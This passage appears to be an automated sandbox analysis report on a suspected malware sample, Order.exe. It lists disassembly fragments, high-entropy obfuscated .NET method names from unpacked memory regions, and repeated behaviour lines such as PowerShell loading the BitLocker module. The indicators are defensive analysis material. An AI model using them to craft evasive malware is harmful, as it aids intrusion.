                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B928B0 push 4D40979Fh; retf AA07h9_2_00B92A4E
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00BA0F74 pushfd ; ret 9_2_00BA0F75
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B852E3 pushad ; retf 9_2_00B852E4
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B9B5ED push edx; ret 9_2_00B9B5EE
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B816A4 push edi; retf 9_2_00B816A5
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B976EC push ebx; ret 9_2_00B9779D
                  Source: Order.exeStatic PE information: section name: .text entropy: 7.687118914880025
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, acW5SfF9YyUhqArulx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sOA4rCY1Yg', 'S3v4NhRn9d', 'Mx54zKQqOI', 'OjMCmo5xHV', 'i0wCnKwmU4', 'b1sC4skFMQ', 'G6gCCP7A8j', 'vcXd3sSfiLHVpQd3sRv'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, hdFcovVamCb1xfFUc6.csHigh entropy of concatenated method names: 'pgX7nJcsQx', 'l5O7CAhNrU', 'MvT7jFxXuT', 't2o7QNypcM', 'NUH7lf1aj6', 'uqW7ThGPPS', 'aXg7WUowWG', 'YljkwLLKLV', 'QtvkpI9no4', 've8kr1fF9V'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, ebiiHAkcN1OGwcU4Ja.csHigh entropy of concatenated method names: 'Dispose', 'baMnrmGi75', 'no44Ai8rmG', 'OiOJJt5DKY', 'obEnNq9PNS', 'dNAnzGTW3b', 'ProcessDialogKey', 'TSX4m0BLqa', 'hpm4nFBTT3', 'V4o44NUg12'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, dJ3J8J9Ah8R5XdZZa3.csHigh entropy of concatenated method names: 'SQCWYqsRur', 'NaKWlhdAgF', 'yDoWTCHnNR', 'MQcWL84Anf', 'xIsWuFeLAn', 'YdkTqgtr2R', 'H2sTVvnGvH', 'l3xTwk4Dsw', 'QPZTpROCwF', 'p4ITrqdCKc'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Y5iKKEv7ICSGI3mv4X.csHigh entropy of concatenated method names: 'mdbLQ36ZtL', 'QGWL5NoDlF', 'd1NLWSYD1S', 'MCaWNSw1Jn', 'QcmWzf2bUs', 'nJVLmCLQLq', 'qlDLnOMWyX', 'o35L4wlxb4', 'fUxLCI6h2h', 'BwwLj1KTG7'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, vsJPJ8wiUDP8Q5YU7L.csHigh entropy of concatenated method names: 'S67osukIT', 'vmpsEqYAo', 'GWmGDDQex', 't0P3hCD4i', 'JdVxQC2S5', 'PguXApGO8', 'WFA3lhp3AwWLXprWIA', 'mtiNpue92nyH8fmQma', 'SeasOU2qYkdd71lCtO', 'DjXkOXTsF'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, SiqmXvT9vhsvXyK3Br.csHigh entropy of concatenated method names: 'CNiktdlXXt', 'FKkkAATEUd', 'xCGkSiplOy', 'lQokfv3mZx', 'YsAkhNrQ94', 'FJrk2tqA3K', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, YZpuslOYmfe3I2eVcA.csHigh entropy of concatenated method names: 'PLKkQDawog', 'mxUklhObx0', 'UBmk5VLDkh', 'zuYkTCJ762', 'jQukWFKJaH', 'hYnkLg0O0S', 'oUrkuhsBGr', 'ETgkgFpx8m', 'GCmkB4PRuQ', 'zt6k1l7yqU'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, jyDtlRd2O4wLdw9xdCk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crbdhcREsy', 'RVsdUARGlJ', 'K7ndEQGnIi', 'LVadvBb5ZB', 'OAYdqaPHLm', 'hTrdVesTFg', 'uWrdw5GVEB'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Qktf1w6flDifV2f9qc.csHigh entropy of concatenated method names: 'ToString', 'Io70yCnTMS', 'Blg0Ag7dVp', 'MYh0SO3R5l', 'IFw0f7w9JB', 'Mi902E5OA7', 'hJy080S3S1', 'lPN0PjmH5b', 'ysW06s6PD1', 'u2v0DFfEpc'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, eZxUQI3Y6ahom9b2gf.csHigh entropy of concatenated method names: 'EuwIRJiUOM', 'GA3IxmPh9A', 'grLItf88Ka', 'RTDIAOlDvR', 'n5ZIfr5v7H', 'KWKI2TMN4Q', 'fsCIPEPGZG', 'uCJI67W2F8', 'ipfIb3Vesa', 'IOxIyVONQL'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, iraWgDCvcpMKvLysVo.csHigh entropy of concatenated method names: 'ppnnLYAbJG', 'BM2nu42KZB', 'I0pnB4nNjN', 'fsbn1WsYrn', 'JlSneTaA7m', 'Rv5n0JxEow', 'R8fimnUmSHjxdEQO3n', 'JyFeZQNt3O8Mjrv73V', 'GQVnnXq9HA', 'd0dnCCapKA'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, MWeOuwAZhJZQTvaZhv.csHigh entropy of concatenated method names: 'p1TS9rGsiLBruLsy0vm', 'PgjwYEGx44XYG3xMm3I', 'wkQWkcKtcH', 'DR0W7C4UUw', 'av8WdyA7g1', 'BNb2p6GFDapJpESHwAu', 'FL0rmeG17BNXiVf7vvJ'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, oW1mN9zbVrQALcgpAr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'emx7IcS8P8', 'Rh37eZEl9C', 'WyP70wMKta', 'xn97K3E8Tf', 'vIJ7knNNtL', 'VKJ771I97J', 'Nic7dZVgMK'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, GsUKhkmNXVhqSn5Vh4.csHigh entropy of concatenated method names: 'Te65s2Yw3h', 'RaW5G3KBtg', 'lAp5RHYUvS', 'Mlx5xbCugD', 'HLI5eD0kdO', 'bqG50UOTNr', 'Xcu5KEIiQ7', 'rPf5kervAg', 'tj457xFgrG', 'tYq5dEsLcU'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, BvSvBD7ob3FB1JAgMd.csHigh entropy of concatenated method names: 'DWJebISlG6', 'npMeayxJ3D', 'B3uehYBS7S', 'oqseUKhYNO', 'vf6eAkHlQd', 'IoseSDNpEo', 'Q0UefCtwWa', 'mu2e27eZBC', 'UCve8ceGEy', 'PD2ePLwxmR'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, Qadts1g3OiuC6HQWNv.csHigh entropy of concatenated method names: 'rFxLHWXbrr', 'AbZLOQVWKX', 'gr5LotJikX', 'OoLLsEXkOK', 'PPvLiGkpNO', 'plXLG586te', 'nuDL3KjgGR', 'Nt0LRaf5wo', 'lYYLxQ931A', 'tYSLXnEx7l'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, yYnVrkdiwJRuEcsWluo.csHigh entropy of concatenated method names: 'jgV7HJGMHM', 'seu7O6R8RG', 'uy37oF6cZd', 'mlH7stal8j', 'Ai27ic1wT5', 'DOE7Gh31U4', 'wXa73oy4xM', 'u6u7R58XQ4', 'Wu57xAHhXA', 'w7s7XfQusH'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, e0Jj8NretasBlK1ELL.csHigh entropy of concatenated method names: 'JHCKpBnXs9', 'PBMKNW6Nvn', 'cLdkmjoiD8', 'wr0knNLePG', 'sCIKyaqojw', 'VO5KaifPc9', 'YD0KZqW9NP', 'IHKKhjFyVq', 'xTKKUmNDdg', 'qt6KEE2T3E'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csHigh entropy of concatenated method names: 'IfjCYKHbMB', 'w8vCQdhrus', 'RA3ClcO8yG', 'HufC5Te2ra', 'ipaCTnMcUr', 'Tq3CWmpVGe', 'bPUCLCcEow', 'CdYCuHU901', 'VaXCgWvPXV', 'lrtCBRnuGh'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csHigh entropy of concatenated method names: 'D1Klh34gwq', 'tbXlUBqgOK', 'MkolEtsJEs', 'KeQlv7xkxW', 'GpHlqDw8nG', 'rS9lVj7YvO', 'eYSlwmptru', 'nNllpLdIMa', 'BIvlrK9YNb', 'IxZlNca0OH'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, acW5SfF9YyUhqArulx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sOA4rCY1Yg', 'S3v4NhRn9d', 'Mx54zKQqOI', 'OjMCmo5xHV', 'i0wCnKwmU4', 'b1sC4skFMQ', 'G6gCCP7A8j', 'vcXd3sSfiLHVpQd3sRv'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, hdFcovVamCb1xfFUc6.csHigh entropy of concatenated method names: 'pgX7nJcsQx', 'l5O7CAhNrU', 'MvT7jFxXuT', 't2o7QNypcM', 'NUH7lf1aj6', 'uqW7ThGPPS', 'aXg7WUowWG', 'YljkwLLKLV', 'QtvkpI9no4', 've8kr1fF9V'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, ebiiHAkcN1OGwcU4Ja.csHigh entropy of concatenated method names: 'Dispose', 'baMnrmGi75', 'no44Ai8rmG', 'OiOJJt5DKY', 'obEnNq9PNS', 'dNAnzGTW3b', 'ProcessDialogKey', 'TSX4m0BLqa', 'hpm4nFBTT3', 'V4o44NUg12'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, dJ3J8J9Ah8R5XdZZa3.csHigh entropy of concatenated method names: 'SQCWYqsRur', 'NaKWlhdAgF', 'yDoWTCHnNR', 'MQcWL84Anf', 'xIsWuFeLAn', 'YdkTqgtr2R', 'H2sTVvnGvH', 'l3xTwk4Dsw', 'QPZTpROCwF', 'p4ITrqdCKc'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, Y5iKKEv7ICSGI3mv4X.csHigh entropy of concatenated method names: 'mdbLQ36ZtL', 'QGWL5NoDlF', 'd1NLWSYD1S', 'MCaWNSw1Jn', 'QcmWzf2bUs', 'nJVLmCLQLq', 'qlDLnOMWyX', 'o35L4wlxb4', 'fUxLCI6h2h', 'BwwLj1KTG7'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, vsJPJ8wiUDP8Q5YU7L.csHigh entropy of concatenated method names: 'S67osukIT', 'vmpsEqYAo', 'GWmGDDQex', 't0P3hCD4i', 'JdVxQC2S5', 'PguXApGO8', 'WFA3lhp3AwWLXprWIA', 'mtiNpue92nyH8fmQma', 'SeasOU2qYkdd71lCtO', 'DjXkOXTsF'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, SiqmXvT9vhsvXyK3Br.csHigh entropy of concatenated method names: 'CNiktdlXXt', 'FKkkAATEUd', 'xCGkSiplOy', 'lQokfv3mZx', 'YsAkhNrQ94', 'FJrk2tqA3K', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, YZpuslOYmfe3I2eVcA.csHigh entropy of concatenated method names: 'PLKkQDawog', 'mxUklhObx0', 'UBmk5VLDkh', 'zuYkTCJ762', 'jQukWFKJaH', 'hYnkLg0O0S', 'oUrkuhsBGr', 'ETgkgFpx8m', 'GCmkB4PRuQ', 'zt6k1l7yqU'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, jyDtlRd2O4wLdw9xdCk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crbdhcREsy', 'RVsdUARGlJ', 'K7ndEQGnIi', 'LVadvBb5ZB', 'OAYdqaPHLm', 'hTrdVesTFg', 'uWrdw5GVEB'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, Qktf1w6flDifV2f9qc.csHigh entropy of concatenated method names: 'ToString', 'Io70yCnTMS', 'Blg0Ag7dVp', 'MYh0SO3R5l', 'IFw0f7w9JB', 'Mi902E5OA7', 'hJy080S3S1', 'lPN0PjmH5b', 'ysW06s6PD1', 'u2v0DFfEpc'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, eZxUQI3Y6ahom9b2gf.csHigh entropy of concatenated method names: 'EuwIRJiUOM', 'GA3IxmPh9A', 'grLItf88Ka', 'RTDIAOlDvR', 'n5ZIfr5v7H', 'KWKI2TMN4Q', 'fsCIPEPGZG', 'uCJI67W2F8', 'ipfIb3Vesa', 'IOxIyVONQL'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, iraWgDCvcpMKvLysVo.csHigh entropy of concatenated method names: 'ppnnLYAbJG', 'BM2nu42KZB', 'I0pnB4nNjN', 'fsbn1WsYrn', 'JlSneTaA7m', 'Rv5n0JxEow', 'R8fimnUmSHjxdEQO3n', 'JyFeZQNt3O8Mjrv73V', 'GQVnnXq9HA', 'd0dnCCapKA'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, MWeOuwAZhJZQTvaZhv.csHigh entropy of concatenated method names: 'p1TS9rGsiLBruLsy0vm', 'PgjwYEGx44XYG3xMm3I', 'wkQWkcKtcH', 'DR0W7C4UUw', 'av8WdyA7g1', 'BNb2p6GFDapJpESHwAu', 'FL0rmeG17BNXiVf7vvJ'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, oW1mN9zbVrQALcgpAr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'emx7IcS8P8', 'Rh37eZEl9C', 'WyP70wMKta', 'xn97K3E8Tf', 'vIJ7knNNtL', 'VKJ771I97J', 'Nic7dZVgMK'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, GsUKhkmNXVhqSn5Vh4.csHigh entropy of concatenated method names: 'Te65s2Yw3h', 'RaW5G3KBtg', 'lAp5RHYUvS', 'Mlx5xbCugD', 'HLI5eD0kdO', 'bqG50UOTNr', 'Xcu5KEIiQ7', 'rPf5kervAg', 'tj457xFgrG', 'tYq5dEsLcU'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, BvSvBD7ob3FB1JAgMd.csHigh entropy of concatenated method names: 'DWJebISlG6', 'npMeayxJ3D', 'B3uehYBS7S', 'oqseUKhYNO', 'vf6eAkHlQd', 'IoseSDNpEo', 'Q0UefCtwWa', 'mu2e27eZBC', 'UCve8ceGEy', 'PD2ePLwxmR'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, Qadts1g3OiuC6HQWNv.csHigh entropy of concatenated method names: 'rFxLHWXbrr', 'AbZLOQVWKX', 'gr5LotJikX', 'OoLLsEXkOK', 'PPvLiGkpNO', 'plXLG586te', 'nuDL3KjgGR', 'Nt0LRaf5wo', 'lYYLxQ931A', 'tYSLXnEx7l'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, yYnVrkdiwJRuEcsWluo.csHigh entropy of concatenated method names: 'jgV7HJGMHM', 'seu7O6R8RG', 'uy37oF6cZd', 'mlH7stal8j', 'Ai27ic1wT5', 'DOE7Gh31U4', 'wXa73oy4xM', 'u6u7R58XQ4', 'Wu57xAHhXA', 'w7s7XfQusH'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, e0Jj8NretasBlK1ELL.csHigh entropy of concatenated method names: 'JHCKpBnXs9', 'PBMKNW6Nvn', 'cLdkmjoiD8', 'wr0knNLePG', 'sCIKyaqojw', 'VO5KaifPc9', 'YD0KZqW9NP', 'IHKKhjFyVq', 'xTKKUmNDdg', 'qt6KEE2T3E'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csHigh entropy of concatenated method names: 'IfjCYKHbMB', 'w8vCQdhrus', 'RA3ClcO8yG', 'HufC5Te2ra', 'ipaCTnMcUr', 'Tq3CWmpVGe', 'bPUCLCcEow', 'CdYCuHU901', 'VaXCgWvPXV', 'lrtCBRnuGh'
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csHigh entropy of concatenated method names: 'D1Klh34gwq', 'tbXlUBqgOK', 'MkolEtsJEs', 'KeQlv7xkxW', 'GpHlqDw8nG', 'rS9lVj7YvO', 'eYSlwmptru', 'nNllpLdIMa', 'BIvlrK9YNb', 'IxZlNca0OH'
                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.csHigh entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
